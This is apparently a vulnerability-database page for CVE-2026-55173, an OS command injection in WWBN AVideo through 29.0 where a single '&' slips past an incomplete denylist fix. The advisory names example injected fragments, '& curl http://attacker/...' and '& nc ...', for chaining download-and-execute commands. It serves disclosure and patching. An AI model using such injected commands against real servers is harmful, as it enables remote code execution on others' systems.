CVE-2026-55173
Last modified
CVE-2026-55173 is a high-severity vulnerability rated 8.1/10 on the CVSS scale. WWBN AVideo is an open source video platform. Versions 29.0 and below remain vulnerable to OS command injection because the fix for CVE-2026-33482 was incomplete and still does not neutralize a single & ( the shell background operator). EPSS estimates a 3.43% chance of exploitation in the next 30 days.
Description
WWBN AVideo is an open source video platform. Versions 29.0 and below remain vulnerable to OS command injection because the fix for CVE-2026-33482 was incomplete and still does not neutralize a single & ( the shell background operator). CVE-2026-33482 reported that sanitizeFFmpegCommand() (plugin/API/standAlone/functions.php) failed to strip $(...) command substitution, allowing OS command injection at the execAsync() sh -c sink. The fix (commit 25c8ab90) added $, (, ), {, }, \n, \r to the denylist character class and a str_replace('&&', '', ...), but did not account for the single &. ffmpeg.json.php builds the command from _decryptString(getInput('codeToExecEncrypted')). This is the same threat model the original advisory accepted (“an attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server”) and the same CVSS basis (AV:N/AC:H/PR:N). Multiple &-separated commands can be chained (e.g. download + execute). Redirect-based payloads are blocked by the > strip, but command execution (e.g. & curl http://attacker/..., & nc ..., dropping/running a file) is not. This issue has been patched by this commit: https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f.
Metrics
Weakness Enumeration
Affected Software
Source: CNA advisory (CVE.org). NVD analysis pending.
| Vendor | Product | Versions |
|---|---|---|
| WWBN | AVideo | <= 29.0 |
References
Timeline
- Published
- Last Modified
- Status
- Deferred
Frequently Asked Questions
What is CVE-2026-55173?
How severe is CVE-2026-55173?
How do I fix CVE-2026-55173?
How Strix Helps
- How Strix found a critical auth bypass in etcdStrix autonomously discovered a critical authentication bypass in etcd, later designated CVE-2026-33413.
- Autonomous PentestingAI agents that find and validate exploitable vulnerabilities like this one across your applications.
- PR ReviewsPentest every pull request so vulnerable code is caught before it ships to production.
- AI Penetration TestingHow AI-driven penetration testing continuously covers your attack surface.
Related CVEs from 2026
- CVE-2026-55163Lemur manages TLS certificate creation. Prior to 1.9.2, PUT …6.3
- CVE-2026-55164Lemur manages TLS certificate creation. Prior to 1.9.2, lemu…4.9
- CVE-2026-55165Lemur manages TLS certificate creation. Prior to 1.9.2, the …4.8
- CVE-2026-55166Lemur manages TLS certificate creation. Prior to 1.9.2, auth…9.9
- CVE-2026-55168Runtipi is a personal homeserver orchestrator. In 4.10.0 and…6.5
- CVE-2026-55170OpenFGA is an authorization/permission engine built for deve…5.4
- CVE-2026-55175Spinnaker is an open source, multi-cloud continuous delivery…7.5
- CVE-2026-55178GeoLens is a self-hosted geospatial data catalog with semant…7.5
- CVE-2026-55179Joplin is an open source note-taking and to-do application t…6.5
- CVE-2026-55180pnpm is a package manager. Prior to 10.34.2 and 11.5.3, pnpm…6.5
- CVE-2026-55182LibreNMS is a network monitoring system. In versions from 21…8.6
- CVE-2026-55185Miniflux 2 is an open source feed reader. Prior to 2.3.1, Is…5.1
Are you affected by CVE-2026-55173?
Run a free Strix scan to check your systems for this vulnerability.
Scan your code nowSource: NVD / NIST
